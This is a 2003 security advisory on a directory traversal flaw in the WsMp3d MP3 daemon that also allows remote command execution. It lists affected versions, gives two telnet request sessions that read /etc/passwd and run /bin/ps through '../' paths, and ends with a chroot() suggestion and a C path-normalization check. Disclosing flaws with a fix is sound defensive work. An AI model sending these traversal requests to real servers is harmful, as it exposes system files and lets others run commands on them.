WsMP3d Directory Traversal

	INetCop Security Advisory #2003-0x82-017.a

* Title: WsMP3d Directory Traversing Vulnerability

0x01. Description

WsMp3d is a daemon for playing MP3 files.
The daemon is accessed over the web, and it contains a directory traversal bug.
The bug also allows commands to be executed remotely.

0x02. Vulnerable Packages

Vendor site:

WsMp3-0.0.10.tar.gz version.
WsMp3-0.0.9.tar.gz version.
WsMp3-0.0.8.tar.gz version.
web_server-0.0.7.tar.gz version.
web_server-0.0.6.tar.gz version.
web_server-0.0.5.tar.gz version.
web_server-0.0.4.tar.gz version.
web_server-0.0.3.tar.gz version.
web_server-0.0.2.tar.gz version.
web_server-0.0.1.tar.gz version.

0x03. Exploit

#1) Directory traversal exploit:

A file on the server can be read as follows.

The request path starts with a directory that is known to exist.

bash$ telnet 8000
Connected to
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0

... passwd file here ...

OK, it is possible to read the `/etc/passwd' file!
And if the daemon is run by root? hehehe ;-)

#2) Remote command execution exploit:

bash$ telnet 8000
Connected to
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201

  PID TTY          TIME CMD
29529 pts/2    00:00:00 login
29559 pts/2    00:00:00 su
29560 pts/2    00:00:00 bash
29681 pts/2    00:00:10 WsMp3
29730 pts/2    00:00:00 WsMp3
29731 pts/2    00:00:00 ps
Connection closed by foreign host.

0x04. Patch

It can be solved with the chroot() function. :-)
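
chroot() confines whatever the daemon can open or execute; a server can also reject the request before touching the filesystem. The following is an added example, not WsMp3d code or the advisory author's patch: a lexical path check that refuses any request whose ".." segments climb above the document root. The function name and the assumption that the caller has already percent-decoded the path are illustrative.

```c
#include <stdio.h>
#include <string.h>

/* Lexically normalize a request path (assumed already percent-decoded by the
 * caller). Returns 0 with the cleaned path in out, or -1 if it is malformed,
 * too long, or a ".." segment would climb above the document root. */
int normalize_request_path(const char *req, char *out, size_t outlen)
{
    size_t len = 0;                       /* bytes currently in out */
    const char *p = req;
    if (!req || !out || outlen < 2 || req[0] != '/')
        return -1;
    out[0] = '\0';
    while (*p) {
        while (*p == '/')                 /* collapse repeated slashes */
            p++;
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t n = (size_t)(p - seg);
        if (n == 0 || (n == 1 && seg[0] == '.'))
            continue;                     /* trailing slash or "." */
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 0)
                return -1;                /* would leave the root: reject */
            while (out[--len] != '/')     /* drop the previous segment */
                ;
            out[len] = '\0';
            continue;
        }
        if (len + n + 2 > outlen)
            return -1;                    /* no room for '/' + seg + NUL */
        out[len++] = '/';
        memcpy(out + len, seg, n);
        len += n;
        out[len] = '\0';
    }
    if (len == 0)
        strcpy(out, "/");                 /* request was for the root itself */
    return 0;
}

int main(void)
{
    char buf[256];   /* request path from the advisory's first session */
    const char *req = "/dir/../../../../../../etc/passwd";
    puts(normalize_request_path(req, buf, sizeof buf) ? "REJECT" : buf);
    return 0;
}
```

The check applies to the path regardless of method, so it covers both the GET and the POST request shown above. Being purely lexical, it does not resolve symbolic links inside the served tree.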

P.S: Sorry for my poor English.

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,

INetCop Security Home: (Korean hacking game)

